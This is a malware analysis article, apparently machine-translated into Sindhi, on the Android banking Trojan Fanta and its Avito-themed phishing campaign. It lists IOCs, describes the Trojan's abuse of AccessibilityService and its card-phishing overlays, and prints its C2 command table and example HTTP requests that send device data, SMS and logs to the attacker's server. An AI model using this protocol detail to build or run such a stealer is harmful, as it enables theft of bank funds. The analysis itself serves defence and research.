🥇 ليسيا، فانتا: پراڻي اينڊرائيڊ ٽروجن جون نيون حڪمت عمليون

هڪ ڏينهن توهان Avito تي ڪجهه وڪڻڻ چاهيو ٿا ۽، توهان جي پيداوار جي تفصيلي وضاحت پوسٽ ڪرڻ (مثال طور، هڪ رام ماڊل)، توهان هي پيغام وصول ڪندا:

هڪ دفعو توهان لنڪ کوليو، توهان ڏسندا ته هڪ بظاهر معصوم صفحو توهان کي اطلاع ڏيندو، خوش ۽ ڪامياب وڪرو ڪندڙ، ته خريداري ڪئي وئي آهي:

هڪ دفعو توهان "جاري رکو" بٽڻ تي ڪلڪ ڪريو، هڪ اي پي پي فائل هڪ آئڪن سان ۽ هڪ اعتماد وارو نالو توهان جي Android ڊوائيس تي ڊائون لوڊ ڪيو ويندو. توهان هڪ ايپليڪيشن انسٽال ڪئي جيڪا ڪنهن سبب جي ڪري AccessibilityService جي حقن جي درخواست ڪئي، پوءِ ڪجهه ونڊوز ظاهر ٿي ۽ جلدي غائب ٿي ويون ۽... بس.

توھان وڃو پنھنجو بيلنس چيڪ ڪرڻ لاءِ، پر ڪنھن سبب جي ڪري توھان جي بئنڪنگ ايپ وري توھان جي ڪارڊ جا تفصيل پڇي ٿي. ڊيٽا داخل ڪرڻ کان پوء، ڪجهه خوفناڪ ٿئي ٿو: ڪجهه سببن لاء اڃا تائين توهان لاء واضح ناهي، پئسا توهان جي اڪائونٽ مان غائب ٿيڻ شروع ٿئي ٿو. توھان مسئلو حل ڪرڻ جي ڪوشش ڪري رھيا آھيو، پر توھان جو فون مزاحمت ڪري ٿو: اھو "واپس" ۽ "گھر" چابمن کي دٻائي ٿو، بند نٿو ڪري ۽ توھان کي ڪنھن به حفاظتي قدمن کي چالو ڪرڻ جي اجازت نٿو ڏئي. نتيجي طور، توهان بغير پئسن جي رهجي ويا آهيو، توهان جو سامان خريد نه ڪيو ويو آهي، توهان پريشان ۽ حيران ٿي ويا آهيو: ڇا ٿيو؟

جواب سادو آهي: توهان Android Trojan Fanta جو شڪار ٿي ويا آهيو، Flexnet خاندان جو ميمبر. اهو ڪيئن ٿيو؟ اچو ته هاڻي وضاحت ڪريون.

ليکڪ: آندري پولووينکن, جونيئر ماهر مالويئر تجزيي ۾، آئيون پساروف، مالويئر تجزيي ۾ ماهر.

ڪجهه انگ اکر

Android Trojans جو Flexnet خاندان پهريون ڀيرو 2015 ۾ مشهور ٿيو. سرگرمي جي ڪافي عرصي دوران، خاندان ڪيترن ئي ذيلي جنسن تائين وڌايو: فانتا، ليمبوٽ، لپٽن، وغيره. ٽروجن، ۽ ان سان لاڳاپيل انفراسٽرڪچر، اڃا به بيٺو نه آهي: نئين اثرائتي تقسيم اسڪيمن کي ترقي ڪري رهيا آهن - اسان جي صورت ۾، اعلي معيار جي فشنگ صفحا جو مقصد هڪ مخصوص صارف وڪرو ڪندڙ آهي، ۽ ٽروجن ڊولپرز فيشن جي رجحانات جي پيروي ڪندا آهن. وائرس لکڻ - نئين ڪارڪردگي شامل ڪرڻ جيڪا ممڪن بڻائي ٿي ته وڌيڪ موثر طريقي سان پئسا چوري متاثر ٿيل ڊوائيسز ۽ بائي پاس تحفظ واري ميڪانيزم کان.

هن آرٽيڪل ۾ بيان ڪيل مهم جو مقصد آهي روس کان صارفين؛ متاثر ٿيل ڊوائيسز جو هڪ ننڍڙو تعداد يوڪرين ۾ رڪارڊ ڪيو ويو، ۽ قزاقستان ۽ بيلاروس ۾ اڃا به گهٽ.

جيتوڻيڪ Flexnet 4 سالن کان وڌيڪ عرصي کان Android Trojan ميدان ۾ آهي ۽ ڪيترن ئي محققن طرفان تفصيل سان اڀياس ڪيو ويو آهي، اهو اڃا تائين سٺي شڪل ۾ آهي. جنوري 2019 کان شروع ٿي، نقصان جي امڪاني رقم 35 ملين روبل کان وڌيڪ آهي - ۽ اهو صرف روس ۾ مهمن لاء آهي. 2015 ۾، هن Android ٽروجن جا مختلف نسخا زير زمين فورمز تي وڪرو ڪيا ويا، جتي ٽرجن جو سورس ڪوڊ تفصيلي وضاحت سان پڻ ملي سگهي ٿو. مطلب ته دنيا ۾ ٿيل نقصان جا انگ اکر اڃا به وڌيڪ متاثر ڪندڙ آهن. اهڙي پراڻي انسان لاء خراب اشارو نه آهي، اهو ناهي؟

وڪڻڻ کان وٺي فريب تائين

جيئن اڳ ۾ پيش ڪيل اسڪرين شاٽ مان ڏسي سگھجي ٿو فشنگ پيج جي انٽرنيٽ سروس لاءِ اشتهارن جي پوسٽنگ Avito لاءِ، اهو هڪ مخصوص قرباني لاءِ تيار ڪيو ويو هو. ظاهري طور تي، حملو ڪندڙ Avito جي پارسرن مان هڪ استعمال ڪندا آهن، جيڪو وڪرو ڪندڙ جو فون نمبر ۽ نالو ڪڍي ٿو، انهي سان گڏ مصنوعات جي تفصيل. صفحي کي وڌائڻ ۽ APK فائل تيار ڪرڻ کان پوء، مقتول کي سندس نالي سان هڪ ايس ايم ايس موڪليو ويو آهي ۽ هڪ فشنگ صفحي جي هڪ لنڪ جنهن ۾ سندس پراڊڪٽ جي وضاحت ۽ پراڊڪٽ جي "وڪرو" مان حاصل ڪيل رقم شامل آهي. بٽڻ تي ڪلڪ ڪرڻ سان، صارف هڪ بدسلوڪي APK فائل حاصل ڪري ٿو - Fanta.

shcet491 جو هڪ مطالعو[.]ru ڊومين ظاهر ڪيو ته اهو هوسٽنگر جي ڊي اين ايس سرورز ڏانهن نمائندو آهي:

ns1.hostinger.ru
ns2.hostinger.ru
ns3.hostinger.ru
ns4.hostinger.ru

ڊومين زون فائل ۾ IP پتي 31.220.23[.]236، 31.220.23[.]243، ۽ 31.220.23[.]235 ڏانهن اشارو ڪندڙ داخلائون شامل آهن. بهرحال، ڊومين جو پرائمري ريسورس رڪارڊ (اي رڪارڊ) IP پتي سان سرور ڏانهن اشارو ڪري ٿو 178.132.1[.]240.

IP پتو 178.132.1[.]240 هالينڊ ۾ واقع آهي ۽ ميزبان سان تعلق رکي ٿو ورلڊ اسٽريم. IP پتي 31.220.23[.]235, 31.220.23[.]236 ۽ 31.220.23[.]243 برطانيه ۾ واقع آهن ۽ گڏيل ميزباني سرور HOSTINGER سان تعلق رکن ٿا. رڪارڊر طور استعمال ڪيو openprov-ru. هيٺيون ڊومين به حل ڪيو ويو IP پتي 178.132.1[.]240:

sdelka-ru[.]ru
tovar-av[.]ru
av-tovar[.]ru
ru-sdelka[.]ru
shcet382[.]ru
sdelka221[.]ru
sdelka211[.]ru
vyplata437[.]ru
viplata291[.]ru
perevod273[.]ru
perevod901[.]ru

اها ڳالهه نوٽ ڪرڻ گهرجي ته هيٺ ڏنل فارميٽ ۾ لنڪ لڳ ڀڳ سڀني ڊومينس مان موجود هئا:

http://(www.){0,1}<%domain%>/[0-9]{7}

ھن ٽيمپليٽ ۾ ھڪڙي ايس ايم ايس پيغام جي لنڪ پڻ شامل آھي. تاريخي انگن اکرن جي بنياد تي، اهو مليو آهي ته هڪ ڊومين مٿي بيان ڪيل نموني ۾ ڪيترن ئي لنڪس سان ملندو آهي، جنهن مان ظاهر ٿئي ٿو ته هڪ ڊومين استعمال ڪيو ويو ٽرجن کي ورهائڻ لاء ڪيترن ئي متاثرين کي.

اچو ته ٿورڙو اڳتي وڌون: ٽروجن هڪ ايس ايم ايس جي لنڪ ذريعي ڊائون لوڊ ڪيو ايڊريس استعمال ڪري ٿو onusedseddohap [.] ڪلب. ھي ڊومين 2019-03-12 تي رجسٽر ٿيو، ۽ 2019-04-29 کان شروع ٿي، APK ايپليڪيشنن ھن ڊومين سان رابطو ڪيو. VirusTotal کان حاصل ڪيل ڊيٽا جي بنياد تي، مجموعي طور تي 109 ايپليڪيشنن جو تعلق هن سرور سان. ڊومين پاڻ کي IP پتي تي حل ڪيو 217.23.14 [.] 27هالينڊ ۾ واقع آهي ۽ ميزبان جي ملڪيت آهي ورلڊ اسٽريم. رڪارڊر طور استعمال ڪيو نامڪمل. ڊومين به هن IP پتي تي حل ڪيو بيڊ ريڪون [.] ڪلب (شروعاتي 2018-09-25) ۽ بڇڙو رڪوون[.] جيئرو (2018-10-25 کان شروع ٿئي ٿو). ڊومين سان بيڊ ريڪون [.] ڪلب 80 کان وڌيڪ APK فائلن سان رابطو ڪيو بڇڙو رڪوون[.] جيئرو - 100 کان وڌيڪ.

عام طور تي، حملي جي ترقي هيٺ ڏنل آهي:

Fanta جي لڪي هيٺ ڇا آهي؟

ٻين ڪيترن ئي Android Trojans وانگر، Fanta ايس ايم ايس پيغامن کي پڙهڻ ۽ موڪلڻ، يو ايس ايس ڊي درخواستون ڪرڻ، ۽ ايپليڪيشنن جي چوٽي تي پنهنجون ونڊوز ڊسپلي ڪرڻ جي قابل آهي (بشمول بئنڪنگ وارا). بهرحال، هن خاندان جي ڪارڪردگي جو هٿيار اچي چڪو آهي: Fanta استعمال ڪرڻ شروع ڪيو رسائي جي خدمت مختلف مقصدن لاءِ: ٻين ايپليڪيشنن کان نوٽيفڪيشن جي مواد کي پڙهڻ، ڳولڻ کي روڪڻ ۽ هڪ متاثر ٿيل ڊوائيس تي ٽرجن جي عمل کي روڪڻ، وغيره. Fanta Android جي سڀني ورزن تي ڪم ڪري ٿو جيڪو 4.4 کان ننڍو ناهي. هن آرٽيڪل ۾ اسان هيٺ ڏنل Fanta نموني تي وڌيڪ نظر وجهنداسين:

ايم ڊي اينيمڪس: 0826bd11b2c130c4c8ac137e395ac2d4
SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

فوري طور تي لانچ کان پوء

فوري طور تي لانچ کان پوء، ٽرجن ان جي آئڪن کي لڪايو. ايپليڪيشن صرف ڪم ڪري سگهي ٿي جيڪڏهن متاثر ٿيل ڊوائيس جو نالو فهرست ۾ نه آهي:

Android_x86
VirtualBox
Nexus 5X (bullhead)
Nexus 5 (استرا)

هي چيڪ ٽروجن جي مکيه خدمت ۾ ڪيو ويندو آهي - مکيه خدمت. جڏهن پهريون ڀيرو شروع ڪيو ويو، ايپليڪيشن جي ترتيب جي پيٽرولن کي ڊفالٽ قدرن جي شروعات ڪئي وئي آهي (ڪانفگريشن ڊيٽا کي محفوظ ڪرڻ لاء فارميٽ ۽ انهن جي معني بعد ۾ بحث ڪيو ويندو)، ۽ هڪ نئين متاثر ٿيل ڊوائيس ڪنٽرول سرور تي رجسٽر ٿيل آهي. هڪ HTTP پوسٽ درخواست پيغام جي قسم سان سرور ڏانهن موڪلي ويندي register_bot ۽ متاثر ٿيل ڊوائيس بابت معلومات (Android ورجن، IMEI، فون نمبر، آپريٽر جو نالو ۽ ملڪ جو ڪوڊ جنهن ۾ آپريٽر رجسٽر ٿيل آهي). ايڊريس ڪنٽرول سرور طور ڪم ڪري ٿو hXXp://onuseseddohap[.]club/controller.php. جواب ۾، سرور هڪ پيغام موڪلي ٿو جنهن ۾ فيلڊ شامل آهن bot_id, bot_pwd, سرور - ايپليڪيشن انهن قدرن کي محفوظ ڪري ٿي CnC سرور جي پيٽرولن جي طور تي. پيرا ميٽر سرور اختياري جيڪڏھن فيلڊ حاصل نه ڪيو ويو: Fanta استعمال ڪري ٿو رجسٽريشن ايڊريس - hXXp://onuseseddohap[.]club/controller.php. CnC ايڊريس کي تبديل ڪرڻ جو ڪم ٻن مسئلن کي حل ڪرڻ لاءِ استعمال ڪري سگھجي ٿو: لوڊ کي ڪيترن ئي سرورن جي وچ ۾ برابريءَ سان ورهائڻ لاءِ (وڏي تعداد ۾ متاثر ٿيل ڊوائيسز سان، اڻڄاتل ويب سرور تي لوڊ تمام گھڻو ٿي سگھي ٿو) ۽ متبادل استعمال ڪرڻ لاءِ. سي اين سي سرورز مان هڪ جي ناڪامي جي صورت ۾ سرور.

جيڪڏهن درخواست موڪلڻ دوران ڪا غلطي ٿئي ٿي، ٽروجن 20 سيڪنڊن کان پوءِ رجسٽريشن جي عمل کي ورجائيندو.

هڪ دفعو ڊوائيس ڪاميابي سان رجسٽر ٿي وئي آهي، Fanta صارف کي هيٺ ڏنل پيغام ڏيکاريندو:

اهم نوٽ: خدمت سڏيو سسٽم سيڪيورٽي - ٽرجن سروس جو نالو، ۽ بٽڻ تي ڪلڪ ڪرڻ کان پوء ٺيڪ هڪ ونڊو کليل هوندي جنهن سان متاثر ٿيل ڊيوائس جي رسائي سيٽنگون، جتي صارف کي لازمي طور تي بدسلوڪي خدمت لاءِ رسائي جا حق ڏيڻ گهرجن:

جيترو جلدي يوزر آن ٿئي رسائي جي خدمت, Fanta اپليڪيشن ونڊوز جي مواد تائين رسائي حاصل ڪري ٿو ۽ انهن ۾ ڪيل ڪارناما:

فوري طور تي رسائي جا حق حاصل ڪرڻ کان پوء، ٽروجن منتظم جي حقن ۽ اطلاعن کي پڙهڻ جي حقن جي درخواست ڪري ٿو:

AccessibilityService استعمال ڪندي، ايپليڪيشن ڪي اسٽروڪ کي نقل ڪري ٿي، ان ڪري پاڻ کي سڀ ضروري حق ڏئي ٿي.

Fanta ڪيترن ئي ڊيٽابيس مثالن کي ٺاهي ٿو (جنهن کي بعد ۾ بيان ڪيو ويندو) ترتيب ڏيڻ واري ڊيٽا کي ذخيرو ڪرڻ لاء ضروري آهي، انهي سان گڏ انفڪشن ٿيل ڊوائيس بابت پروسيس ۾ گڏ ڪيل معلومات. گڏ ڪيل معلومات موڪلڻ لاءِ، ٽروجن هڪ ورجائي ڪم ٺاهي ٿو جيڪو ڊيٽابيس مان فيلڊز کي ڊائون لوڊ ڪرڻ ۽ ڪنٽرول سرور کان حڪم حاصل ڪرڻ لاءِ ٺهيل آهي. CnC تائين رسائي لاءِ وقفو مقرر ڪيو ويو آهي Android ورزن جي بنياد تي: 5.1 جي صورت ۾، وقفو 10 سيڪنڊ هوندو، ٻي صورت ۾ 60 سيڪنڊ.

حڪم حاصل ڪرڻ لاء، Fanta هڪ درخواست ڪري ٿو GetTask مئنيجمينٽ سرور ڏانهن. جواب ۾، CnC ھيٺ ڏنل حڪمن مان ھڪڙو موڪلي سگھي ٿو:

ٽيم	بيان
0	ايس ايم ايس پيغام موڪليو
1	هڪ فون ڪال ڪريو يا يو ايس ايس ڊي حڪم
2	ھڪڙو پيٽرولر تازه ڪاري ڪري ٿو وقار
3	ھڪڙو پيٽرولر تازه ڪاري ڪري ٿو ان جي مدد
6	ھڪڙو پيٽرولر تازه ڪاري ڪري ٿو ايس ايم ايس مئنيجر
9	ايس ايم ايس پيغام گڏ ڪرڻ شروع ڪريو
11	پنھنجي فون کي فيڪٽري سيٽنگون ڏانھن ري سيٽ ڪريو
12	ڊائلاگ باڪس ٺاھڻ جي لاگنگ کي فعال/بند ڪريو

Fanta پڻ 70 بئنڪنگ ايپس، تيز ادائگي جي سسٽم ۽ اي-والٽس مان نوٽيفڪيشن گڏ ڪري ٿو ۽ انهن کي ڊيٽابيس ۾ محفوظ ڪري ٿو.

اسٽوريج جي جوڙجڪ جي ماپ

ڪنفيگريشن پيرا ميٽرز کي ذخيرو ڪرڻ لاءِ، Fanta Android پليٽ فارم لاءِ معياري طريقو استعمال ڪري ٿو. ترجيحات- فائلون. سيٽنگون نالي فائل ۾ محفوظ ڪيون وينديون سيٽنگون. هيٺ ڏنل جدول ۾ محفوظ ڪيل پيٽرولن جي وضاحت آهي.

نالو	ڊفالٽ قدر	ممڪن قدر	بيان
id	0	انٽيجر	بوٽ جي سڃاڻپ
سرور	hXXp://onuseseddohap[.]club/	URL جو	ڪنٽرول سرور ايڊريس
پڪو	-	اسٽرنگ	سرور پاسورڊ
وقار	20	انٽيجر	وقت جو وقفو. اشارو ڪري ٿو ته هيٺين ڪمن کي ڪيتري وقت تائين ملتوي ڪيو وڃي: جڏهن موڪليل ايس ايم ايس پيغام جي حيثيت جي باري ۾ هڪ درخواست موڪلڻ مئنيجمينٽ سرور کان نئون حڪم حاصل ڪرڻ
ان جي مدد	سڀ	سڀ/telNumber	جيڪڏهن فيلڊ اسٽرنگ جي برابر آهي سڀ يا ٽيليفون نمبر، پوءِ موصول ٿيل ايس ايم ايس پيغام ايپليڪيشن طرفان روڪيو ويندو ۽ صارف کي نه ڏيکاريو ويندو
ايس ايم ايس مئنيجر	0	0/1	ڊفالٽ ايس ايم ايس وصول ڪندڙ جي طور تي ايپليڪيشن کي فعال / غير فعال ڪريو
پڙهو ڊائلاگ	ڪوڙي	سچو/ ڪوڙو	ايونٽ لاگنگ کي فعال/بند ڪريو Accessibility Event

Fanta پڻ فائل استعمال ڪري ٿو ايس ايم ايس مئنيجر:

نالو	ڊفالٽ قدر	ممڪن قدر	بيان
pckg	-	اسٽرنگ	ايس ايم ايس پيغام مينيجر جو نالو استعمال ڪيو ويو

ڊيٽابيس سان رابطي

ان جي آپريشن دوران، ٽرجن ٻه ڊيٽابيس استعمال ڪري ٿو. ڊيٽابيس جو نالو a فون مان گڏ ڪيل مختلف معلومات کي ذخيرو ڪرڻ لاء استعمال ڪيو ويو. ٻئي ڊيٽابيس جو نالو رکيو ويو آهي fanta.db ۽ بئنڪ ڪارڊ بابت معلومات گڏ ڪرڻ لاءِ ٺهيل فشنگ ونڊوز ٺاهڻ جي ذميوار سيٽنگن کي محفوظ ڪرڻ لاءِ استعمال ڪيو ويندو آهي.

ٽرجن ڊيٽابيس استعمال ڪري ٿو а گڏ ڪيل معلومات کي ذخيرو ڪرڻ ۽ توهان جي عملن کي لاگ ان ڪرڻ لاء. ڊيٽا ٽيبل ۾ ذخيرو ٿيل آهي بنڊ. ٽيبل ٺاھڻ لاءِ، ھيٺ ڏنل SQL سوال استعمال ڪريو:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

ڊيٽابيس ھيٺ ڏنل معلومات تي مشتمل آھي:

1. هڪ پيغام سان متاثر ٿيل ڊوائيس جي شروعاتي لاگنگ فون آن ٿي ويو!

2. ايپليڪيشنن مان اطلاع. پيغام ھيٺ ڏنل ٽيمپليٽ جي مطابق ٺاھيو ويو آھي:

(<%App Name%>)<%Title%>: <%Notification text%>

3. ٽرجن پاران ٺاهيل فشنگ فارم مان بئنڪ ڪارڊ ڊيٽا. پيرا ميٽر VIEW_NAME هيٺين مان هڪ ٿي سگهي ٿو:

AliExpress
Avito
گوگل کيڏو
متفرق

پيغام هن فارميٽ ۾ لاگ ان ٿيل آهي:

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. فارميٽ ۾ ايندڙ / ٻاھر وڃڻ وارا SMS پيغام:

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>

5. پيڪيج جي باري ۾ معلومات جيڪا ٺاهي ٿي ڊائلاگ باڪس فارميٽ ۾:

(<%Package name%>)<%Package information%>

مثال ٽيبل بنڊ:

Fanta جي ڪارڪردگي مان هڪ آهي بينڪ ڪارڊ بابت معلومات گڏ ڪرڻ. ڊيٽا گڏ ڪرڻ فشنگ ونڊوز جي ٺاھڻ جي ذريعي ٿئي ٿي جڏھن بئنڪنگ ايپليڪيشنن کي کولڻ. ٽروجن صرف هڪ ڀيرو فشنگ ونڊو ٺاهي ٿو. معلومات جيڪا ونڊو صارف کي ڏيکاريل هئي ٽيبل ۾ ذخيرو ٿيل آهي سيٽنگون ڊيٽابيس ۾ fanta.db. ڊيٽابيس ٺاھڻ لاءِ، ھيٺ ڏنل SQL سوال استعمال ڪريو:

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

سڀ ٽيبل فيلڊ سيٽنگون ڊفالٽ طور تي شروع ڪيو ويو 1 (هڪ فشنگ ونڊو ٺاهيو). صارف ان جي ڊيٽا داخل ڪرڻ کان پوء، قيمت مقرر ڪئي ويندي 0. ٽيبل فيلڊ جو مثال سيٽنگون:

can_login - فيلڊ هڪ بينڪنگ ايپليڪيشن کولڻ وقت فارم کي ظاهر ڪرڻ جو ذميوار آهي
پهريون_بئنڪ - استعمال نه ڪيو
can_avito - ايويٽو ايپليڪيشن کي کولڻ وقت فارم کي ظاهر ڪرڻ لاءِ فيلڊ ذميوار آهي
can_ali - فيلڊ Aliexpress ايپليڪيشن کي کولڻ وقت فارم کي ظاهر ڪرڻ جو ذميوار آهي
can_ٻيو - فيلڊ فارم کي ظاهر ڪرڻ لاء ذميوار آهي جڏهن فهرست مان ڪنهن به ايپليڪيشن کي کولڻ لاء: يولا، پانڊائو، ڊرم آٽو، پرس. رعايت ۽ بونس ڪارڊ، Aviasales، بکنگ، Trivago
can_card - فارم کي ظاهر ڪرڻ لاء فيلڊ ذميوار آهي جڏهن کولڻ گوگل کيڏو

انتظام سرور سان رابطي

مينيجمينٽ سرور سان نيٽ ورڪ رابطي HTTP پروٽوڪول ذريعي ٿئي ٿي. نيٽ ورڪ سان ڪم ڪرڻ لاء، Fanta استعمال ڪري ٿو مشهور Retrofit لائبريري. درخواستون موڪليا وڃن ٿا: hXXp://onuseseddohap[.]club/controller.php. سرور ايڊريس تبديل ٿي سگهي ٿو جڏهن سرور تي رجسٽر ٿيو. سرور کان جواب ۾ ڪوڪيز موڪلي سگهجن ٿيون. Fanta سرور کي ھيٺيون درخواستون ڏئي ٿو:

ڪنٽرول سرور تي بوٽ جي رجسٽريشن هڪ ڀيرو ٿيندي آهي، پهرين لانچ تي. متاثر ٿيل ڊوائيس بابت هيٺ ڏنل ڊيٽا سرور ڏانهن موڪلي وئي آهي:
· ڪوڪي - سرور مان مليل ڪوڪيز (ڊفالٽ ويل هڪ خالي اسٽرنگ آهي)
· صورت - مسلسل تار register_bot
· اڳياڙي - مستقل عدد 2
· نسخو_sdk - هيٺ ڏنل ٽيمپليٽ جي مطابق ٺهيل آهي: /(Avit)
· imei - متاثر ٿيل ڊوائيس جو IMEI
· ملڪ - ملڪ جو ڪوڊ جنهن ۾ آپريٽر رجسٽر ٿيل آهي، ISO فارميٽ ۾
· نمبر - فون نمبر
· آپريٽر - آپريٽر جو نالو

سرور ڏانهن موڪليل درخواست جو هڪ مثال:
```
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>
```
درخواست جي جواب ۾، سرور کي ھيٺ ڏنل پيٽرولن تي مشتمل JSON اعتراض واپس ڪرڻ گھرجي.
bot_id - متاثر ٿيل ڊوائيس جي سڃاڻپ. جيڪڏهن bot_id 0 جي برابر آهي، Fanta درخواست تي ٻيهر عمل ڪندو.
bot_pwd - سرور لاء پاسورڊ.
سرور - ڪنٽرول سرور ايڊريس. اختياري پيٽرولر. جيڪڏهن پيٽرول بيان نه ڪيو ويو آهي، ايپليڪيشن ۾ محفوظ ڪيل پتو استعمال ڪيو ويندو.

مثال JSON اعتراض:
```
{
    "response":[
   	 {
   		 "bot_id": <%BOT_ID%>,
   		 "bot_pwd": <%BOT_PWD%>,
   		 "server": <%SERVER%>
   	 }
    ],
    "status":"ok"
}
```

سرور کان حڪم حاصل ڪرڻ جي درخواست. هيٺ ڏنل ڊيٽا سرور ڏانهن موڪلي وئي آهي:
· ڪوڪي - سرور مان مليل ڪوڪيز
· ڳالھ - متاثر ٿيل ڊوائيس جي سڃاڻپ جيڪا درخواست موڪلڻ وقت حاصل ڪئي وئي هئي register_bot
· پڪو - سرور لاء پاسورڊ
· divice_admin - فيلڊ اهو طئي ڪري ٿو ته ڇا منتظم جا حق حاصل ڪيا ويا آهن. جيڪڏهن منتظم جا حق حاصل ڪيا ويا آهن، فيلڊ برابر آهي 1، ٻي صورت ۾ 0
· پهچ - رسائي سروس آپريشن جي حالت. جيڪڏهن خدمت شروع ڪئي وئي، قيمت آهي 1، ٻي صورت ۾ 0
· ايس ايم ايس مئنيجر - ڏيکاري ٿو ته ڇا ٽروجن کي ايس ايم ايس حاصل ڪرڻ لاءِ ڊفالٽ ايپليڪيشن طور فعال ڪيو ويو آهي
· اسڪرين - ڏيکاري ٿو ته اسڪرين ڪهڙي حالت ۾ آهي. قيمت مقرر ڪئي ويندي 1، جيڪڏهن اسڪرين تي آهي، ٻي صورت ۾ 0;

سرور ڏانهن موڪليل درخواست جو هڪ مثال:
```
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>
```
حڪم تي مدار رکندي، سرور واپس ڪري سگھي ٿو JSON اعتراض مختلف پيٽرولن سان:

· ٽيم ايس ايم ايس پيغام موڪليو: پيرا ميٽرز ۾ فون نمبر، ايس ايم ايس پيغام جو متن ۽ موڪليل پيغام جي سڃاڻپ شامل آهي. سڃاڻپ ڪندڙ استعمال ڪيو ويندو آهي جڏهن قسم سان سرور ڏانهن پيغام موڪلڻ setSmsStatus.
```
{
    "response":
    [
   	 {
   		 "mode": 0,
   		 "sms_number": <%SMS_NUMBER%>,
   		 "sms_text": <%SMS_TEXT%>,
   		 "sms_id": %SMS_ID%
   	 }
    ],
    "status":"ok"
}
```
· ٽيم هڪ فون ڪال ڪريو يا يو ايس ايس ڊي حڪم: فون نمبر يا حڪم جوابي جسم ۾ اچي ٿو.
```
{
    "response":
    [
   	 {
   		 "mode": 1,
   		 "command": <%TEL_NUMBER%>
   	 }
    ],
    "status":"ok"
}
```
· ٽيم interval پيٽرول تبديل ڪريو.
```
{
    "response":
    [
   	 {
   		 "mode": 2,
   		 "interval": <%SECONDS%>
   	 }
    ],
    "status":"ok"
}
```
· ٽيم تبديل ڪريو intercept parameter.
```
{
    "response":
    [
   	 {
   		 "mode": 3,
   		 "intercept": "all"/"telNumber"/<%ANY_STRING%>
   	 }
    ],
    "status":"ok"
}
```
· ٽيم تبديل ڪريو SmsManager فيلڊ.
```
{
    "response":
    [
   	 {
   		 "mode": 6,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}
```
· ٽيم هڪ متاثر ٿيل ڊوائيس مان ايس ايم ايس پيغام گڏ ڪريو.
```
{
    "response":
    [
   	 {
   		 "mode": 9
   	 }
    ],
    "status":"ok"
}
```
· ٽيم پنھنجي فون کي فيڪٽري سيٽنگون ڏانھن ري سيٽ ڪريو:
```
{
    "response":
    [
   	 {
   		 "mode": 11
   	 }
    ],
    "status":"ok"
}
```
· ٽيم تبديل ڪريو ReadDialog پيٽرولر.
```
{
    "response":
    [
   	 {
   		 "mode": 12,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}
```

قسم سان پيغام موڪلڻ setSmsStatus. اها درخواست حڪم جاري ٿيڻ کان پوءِ ڪئي وئي آهي ايس ايم ايس پيغام موڪليو. درخواست هن طرح نظر اچي ٿو:

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

ڊيٽابيس جي مواد کي اپ لوڊ ڪرڻ. ھڪڙي قطار في درخواست منتقل ڪئي وئي آھي. هيٺ ڏنل ڊيٽا سرور ڏانهن موڪلي وئي آهي:
· ڪوڪي - سرور مان مليل ڪوڪيز
· صورت - مسلسل تار setSaveInboxSms
· ڳالھ - متاثر ٿيل ڊوائيس جي سڃاڻپ جيڪا درخواست موڪلڻ وقت حاصل ڪئي وئي هئي register_bot
· متن - متن موجوده ڊيٽابيس جي رڪارڊ ۾ (فيلڊ d ٽيبل تان بنڊ ڊيٽابيس ۾ а)
· نمبر - موجوده ڊيٽابيس جي رڪارڊ جو نالو (فيلڊ p ٽيبل تان بنڊ ڊيٽابيس ۾ а)
· sms_mode - انٽيجر ويليو (فيلڊ m ٽيبل تان بنڊ ڊيٽابيس ۾ а)

درخواست هن طرح نظر اچي ٿو:
```
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>
```
جيڪڏهن ڪاميابيءَ سان سرور ڏانهن موڪليو ويو ته، قطار کي ميز تان هٽايو ويندو. سرور طرفان واپس ڪيل JSON اعتراض جو مثال:
```
{
    "response":[],
    "status":"ok"
}
```

AccessibilityService سان رابطو

AccessibilityService لاڳو ڪئي وئي ته جيئن Android ڊوائيسز کي معذور ماڻهن لاءِ استعمال ڪرڻ آسان بڻائي سگهجي. اڪثر ڪيسن ۾، ايپليڪيشن سان لهه وچڙ ۾ جسماني رابطي جي ضرورت هوندي آهي. AccessibilityService توهان کي اجازت ڏئي ٿي انهن کي پروگرام طور تي. Fanta بينڪنگ ايپليڪيشنن ۾ جعلي ونڊوز ٺاهڻ ۽ صارفين کي سسٽم سيٽنگون ۽ ڪجهه ايپليڪيشنن کي کولڻ کان روڪڻ لاء سروس استعمال ڪري ٿو.

